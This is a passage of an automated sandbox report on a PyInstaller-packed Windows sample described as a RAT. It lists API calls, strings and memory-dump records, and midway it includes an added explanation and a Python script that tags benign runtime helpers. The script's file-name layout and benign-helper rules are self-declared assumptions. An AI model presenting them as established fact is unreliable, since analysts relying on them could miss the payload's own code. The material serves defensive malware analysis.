                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID: char $int $long $short $unsigned
                                                                                                                                                                                                      • API String ID: 2943138195-3894466517
                                                                                                                                                                                                      • Opcode ID: a795c7ce3634cae38f4d320bfb7043b724aba026ad47a4d3d8bcb9e9dd899c8c
                                                                                                                                                                                                      • Instruction ID: 2a6c48d53bcaf9ac9f80402c1588e5d9693b901885534e8f5aee6860a6825129
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a795c7ce3634cae38f4d320bfb7043b724aba026ad47a4d3d8bcb9e9dd899c8c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97313AFAB18A5189EB02CB7DD8982BC37B4BB08748F548135DB1C56B98DF38E904C708
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7FF58351A,?,00000000,00007FF7FF583F23), ref: 00007FF7FF582AA0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                      • API String ID: 2050909247-2900015858
                                                                                                                                                                                                      • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                      • Instruction ID: 496f0574b170c3ee05a47b060994296b557076bf22040d951dd61f4e7a784b42
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2821A3326197C192E720AB51B8417E6A794FB887C4F800231EEAD43699DF7CD645C790
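Two of the records above are easy to misread as malware logic. The function that calls LoadLibraryExW, GetLastError, FreeLibrary and GetProcAddress next to the string "api-ms-" is the MSVC C runtime's api-set forwarding helper, which every statically linked CRT carries; the GetCurrentProcessId function next to "[PYI-%d:%s]" is the PyInstaller bootloader's log-line formatter (the prefix holds the PID and the level), consistent with the PyInstaller signature at the top of the report. Neither belongs to the RAT payload. The Python script below is an added example, not part of this report or of Joe Sandbox: it parses records in this layout, decodes the .sdmp file name into fields, strips the "Download File" widget residue, and tags records that match well-known runtime helpers so that the untagged ones are what is left to examine. The .sdmp field layout and the benign-helper rules are the example's own assumptions (only the region base, which matches the "Offset:" module base, and the Windows protection and region-type constants are certain); the sample input is copied from the records above with argument lists trimmed.

```python
"""Triage helper for Joe Sandbox per-function records (added example, not report code)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Windows MEMORY_BASIC_INFORMATION constants (certain).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x1000000: "MEM_IMAGE", 0x40000: "MEM_MAPPED", 0x20000: "MEM_PRIVATE"}

# Assumed .sdmp name layout: process idx . snapshot idx . dump id . region base .
# page protection . unexplained field . region type . module idx.  Only the region
# base is confirmed by the report itself (it lies inside the "Offset:" module base).
SDMP_RE = re.compile(r"(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\."
                     r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp")
API_RE = re.compile(r"^(\w+\.\w+)\(.*\), ref: [0-9A-Fa-f]+$")

# Constructed input: four records copied from the report, argument lists trimmed.
SAMPLE = """\
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF7FF58DFEA), ref: 00007FF7FF58DDBD
• GetProcAddress.KERNEL32(?,?,?,00007FF7FF58DFEA), ref: 00007FF7FF58DE6F
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• Instruction Fuzzy Hash: FC316E21B1A68291EF52AB12A8005B5A7D4FF58BA0FD94635ED3D073D4EF3CE458C2A0
APIs
• GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7FF58351A), ref: 00007FF7FF582AA0
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
Similarity
• API ID: CurrentProcess
• String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
APIs
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
Similarity
• API ID: Name::operator+
• String ID: char $int $long $short $unsigned
APIs
Memory Dump Source
• Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
Similarity
• API ID: Dealloc$Bytes_FromSizeStringmemcpy
• String ID: Unable to allocate output buffer.
"""


@dataclass
class Record:
    apis: List[str] = field(default_factory=list)         # e.g. "LoadLibraryExW.KERNEL32"
    fields: Dict[str, str] = field(default_factory=dict)  # "API ID", "String ID", "Source File", ...
    tags: List[str] = field(default_factory=list)


def decode_sdmp(name: str) -> Optional[Dict[str, object]]:
    """Split a memory-dump file name into fields (layout assumed, see comment above)."""
    m = SDMP_RE.search(name)
    if not m:
        return None
    proc, snap, dump_id, base, prot, unexplained, mtype, mod = m.groups()
    return {"process_index": int(proc), "snapshot_index": int(snap), "dump_id": int(dump_id),
            "region_base": int(base, 16),
            "protection": PAGE_PROTECT.get(int(prot, 16), hex(int(prot, 16))),
            "unexplained": int(unexplained, 16),
            "type": MEM_TYPE.get(int(mtype, 16), hex(int(mtype, 16))),
            "module_index": int(mod, 16)}


# Heuristic tags (this example's assumptions, not Joe Sandbox classifications) for
# helpers that every MSVC-built or PyInstaller-packed binary carries.
BENIGN_RULES = [
    ("msvc-crt-apiset-loader", lambda r: "api-ms-" in r.fields.get("String ID", "")
        and {"LoadLibraryExW.KERNEL32", "GetProcAddress.KERNEL32"} <= set(r.apis)),
    ("pyinstaller-bootloader-log", lambda r: "[PYI-" in r.fields.get("String ID", "")),
    ("msvc-undname-demangler", lambda r: "Name::" in r.fields.get("API ID", "")
        or "template-parameter" in r.fields.get("String ID", "")),
]


def parse_records(text: str) -> List[Record]:
    """A record starts at an 'APIs' heading; bullets are API calls or key/value pairs."""
    records: List[Record] = []
    cur: Optional[Record] = None
    for raw in text.splitlines():
        line = raw.strip()                      # report text carries deep indentation
        if line == "APIs":
            cur = Record()
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        m = API_RE.match(body)
        if m:
            cur.apis.append(m.group(1))
            continue
        key, _, val = body.partition(":")
        val = val.replace("Download File", "").strip()   # page-widget residue
        if key.strip() == "Source File":        # "<sdmp>, Offset: <base>, based on PE: true"
            sdmp, _, rest = val.partition(", Offset:")
            cur.fields["Source File"] = sdmp.strip()
            cur.fields["Module Base"] = rest.split(",")[0].strip()
        else:
            cur.fields[key.strip()] = val
    for r in records:
        r.tags = [name for name, pred in BENIGN_RULES if pred(r)]
    return records


def untagged(records: List[Record]) -> List[Record]:
    """Records no benign rule explains: the ones still worth the analyst's time."""
    return [r for r in records if not r.tags]
```

Run against the full "Execution Graph" text of a report rather than the trimmed sample, and extend BENIGN_RULES only with patterns you have confirmed in a clean build of the same runtime; a rule that is too broad hides the payload's own API-resolution code, which on a packed sample looks superficially like the CRT helper.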
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
Similarity
• API ID: Dealloc$Err_StringThread_allocate_lockmemset
• String ID: Unable to allocate lock$compresslevel must be between 1 and 9
• API String ID: 451674277-2500606449
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
Similarity
• API ID: DeallocString$Bytes_Err_FromSizeThread_allocate_lock
• String ID: Unable to allocate lock
• API String ID: 553681934-3516605728
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: Err_$Arg_CallocKeywordsMem_MemoryParseStringTuple
• String ID: Invalid filter specifier for delta filter$|OO&
• API String ID: 2765563044-2010576982
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: Err_$Arg_CallocKeywordsMem_MemoryParseStringTuple
• String ID: Invalid filter specifier for BCJ filter$|OO&
• API String ID: 2765563044-3728029529
                                                                                                                                                                                                      • Opcode ID: 7064889e55b6df43a5fe35f716f8e70b3d3ceef0c1046b6eb05edbc02d36a5e3
                                                                                                                                                                                                      • Instruction ID: 3be08fffc74d21c3700496f28f078a6a6c2a4e9879fe18d2936d48180961d7d7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7064889e55b6df43a5fe35f716f8e70b3d3ceef0c1046b6eb05edbc02d36a5e3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 440105F1A09A4685EB04CF38DC45278B3A4BB44B54F509035CB1E42370EF3DE90AC398
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFBBB63C80D
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB63C7BC: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00007FFBBB63B042), ref: 00007FFBBB63C7F2
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFBBB63C839
                                                                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBBB63C853
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • 1.0.8, 13-Jul-2019, xrefs: 00007FFBBB63C813
                                                                                                                                                                                                      • bzip2/libbzip2: internal error number %d.This is a bug in bzip2/libbzip2, %s.Please report it to: bzip2-devel@sourceware.org. If this happenedwhen you were using some program which uses libbzip2 as acomponent, you should also report this bug to the auth, xrefs: 00007FFBBB63C820
                                                                                                                                                                                                      • *** A special note about internal error number 1007 ***Experience suggests that a common cause of i.e. 1007is unreliable memory or other hardware. The 1007 assertionjust happens to cross-check the results of huge numbers ofmemory reads/writes, and so ac, xrefs: 00007FFBBB63C842
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __acrt_iob_func$__stdio_common_vfprintfexit
                                                                                                                                                                                                      • String ID: bzip2/libbzip2: internal error number %d.This is a bug in bzip2/libbzip2, %s.Please report it to: bzip2-devel@sourceware.org. If this happenedwhen you were using some program which uses libbzip2 as acomponent, you should also report this bug to the auth$*** A special note about internal error number 1007 ***Experience suggests that a common cause of i.e. 1007is unreliable memory or other hardware. The 1007 assertionjust happens to cross-check the results of huge numbers ofmemory reads/writes, and so ac$1.0.8, 13-Jul-2019
                                                                                                                                                                                                      • API String ID: 77255540-989448446
                                                                                                                                                                                                      • Opcode ID: bbeb2fe21641ba72e23235041d2a957e10d8786f8ff80ce4925099a74c7efcec
                                                                                                                                                                                                      • Instruction ID: b0c9d2799752b6013752321d56d706a05865847dcbd6af131aa0fdaabaca08ee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbeb2fe21641ba72e23235041d2a957e10d8786f8ff80ce4925099a74c7efcec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4E039A2A0860752FA185B7CEC95274A365BF14700F00C03EDB0F072B2EEAC2D05C2A9
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+$NameName::
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 168861036-0
                                                                                                                                                                                                      • Opcode ID: fb95027d3fcee506583ce7d96f70b522a78626fdc6e378da2ca402aa0a92e4da
                                                                                                                                                                                                      • Instruction ID: 3cd00e72fbf57066d70ce0f7cf1f1acb310c40e785f3af613489bc68076106f3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb95027d3fcee506583ce7d96f70b522a78626fdc6e378da2ca402aa0a92e4da
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D7188FAB18A5288FB10CB7ED8883AC37A5BB40784F588035DB2D07695DF79E846C704
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF7FF589216), ref: 00007FF7FF588592
                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF5885E9
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF589400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7FF5845E4,00000000,00007FF7FF581985), ref: 00007FF7FF589439
                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF588678
                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF5886E4
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF5886F5
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF58870A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3462794448-0
                                                                                                                                                                                                      • Opcode ID: 6dbcf2dde03bb6a38809b7a2ae0e65b19fecec932480a4a95577cfdf2dcaf52f
                                                                                                                                                                                                      • Instruction ID: dc71c123385a93be16f486061bf5243f00c909a177be6d40365a02fc510fd84e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6dbcf2dde03bb6a38809b7a2ae0e65b19fecec932480a4a95577cfdf2dcaf52f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B41A462B196C241EB30BB12A5446EAA3A4FB84BC5F840235DF7D97BC5DE3CD501C7A4
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeallocEval_Thread$Bytes_FromList_RestoreSaveSizeString
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 722544280-0
                                                                                                                                                                                                      • Opcode ID: 1ec775829b225900bde4c9dbe14ace5db717f71bae4f6aececd6e8635a69a766
                                                                                                                                                                                                      • Instruction ID: c8d042a03b291b0e15a657c4e83d7863a3a23200ea34af7e586f0fbe345e45ae
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ec775829b225900bde4c9dbe14ace5db717f71bae4f6aececd6e8635a69a766
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F14173A3A05B0296EAA59B3DDD04378A2A0FB54B54F188235DF5E437A5DF3CEC51C348
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeallocEval_Thread$Bytes_FromList_RestoreSaveSizeString
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 722544280-0
                                                                                                                                                                                                      • Opcode ID: ccc0e9a76ea1aa43825ab1fd4ac5b019393842f9738757de9c5c8e866fa1cb40
                                                                                                                                                                                                      • Instruction ID: ffea4b87c140646e8825ada27c124ce744647f3810309753819a51b6dde51a3e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ccc0e9a76ea1aa43825ab1fd4ac5b019393842f9738757de9c5c8e866fa1cb40
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 404152B3A1975282EA608B3DE84476CA2A4FB48BA4F158235DF5E437E5DF3CE841C704
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
• String ID:
• API String ID: 3741236498-0
• Opcode ID: d800493cf60e4af3f4a7c920cc646ece182b7dab7bd32bb736cb4877c8bf044e
• Instruction ID: d5aa2caf8389565c1bf32c60708093249cce958bd3b217a8158a713d8e8a0ef5
• Opcode Fuzzy Hash: d800493cf60e4af3f4a7c920cc646ece182b7dab7bd32bb736cb4877c8bf044e
• Instruction Fuzzy Hash: 5A31A1BAB19B5191EA15CF39E81856933A0BF09FE4B954632DF2D03380EE3DD842C304
APIs
  • Part of subcall function 00007FF7FF588760: GetCurrentProcess.KERNEL32 ref: 00007FF7FF588780
  • Part of subcall function 00007FF7FF588760: OpenProcessToken.ADVAPI32 ref: 00007FF7FF588793
  • Part of subcall function 00007FF7FF588760: GetTokenInformation.ADVAPI32 ref: 00007FF7FF5887B8
  • Part of subcall function 00007FF7FF588760: GetLastError.KERNEL32 ref: 00007FF7FF5887C2
  • Part of subcall function 00007FF7FF588760: GetTokenInformation.ADVAPI32 ref: 00007FF7FF588802
  • Part of subcall function 00007FF7FF588760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7FF58881E
  • Part of subcall function 00007FF7FF588760: CloseHandle.KERNEL32 ref: 00007FF7FF588836
• LocalFree.KERNEL32(?,00007FF7FF583C55), ref: 00007FF7FF58916C
• LocalFree.KERNEL32(?,00007FF7FF583C55), ref: 00007FF7FF589175
Strings
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
• API String ID: 6828938-1529539262
• Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
• Instruction ID: 41f2051c5beebed55413ace6f294a047302673919fb108bd8f297b157899db18
• Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
• Instruction Fuzzy Hash: 92213C21A096C282F710BB10E5152EAA6A0FF88780FC44235EA7D53BD6EF3CD805C7E0
APIs
• GetLastError.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B347
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B37D
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3AA
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3BB
• FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3CC
• SetLastError.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3E7
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
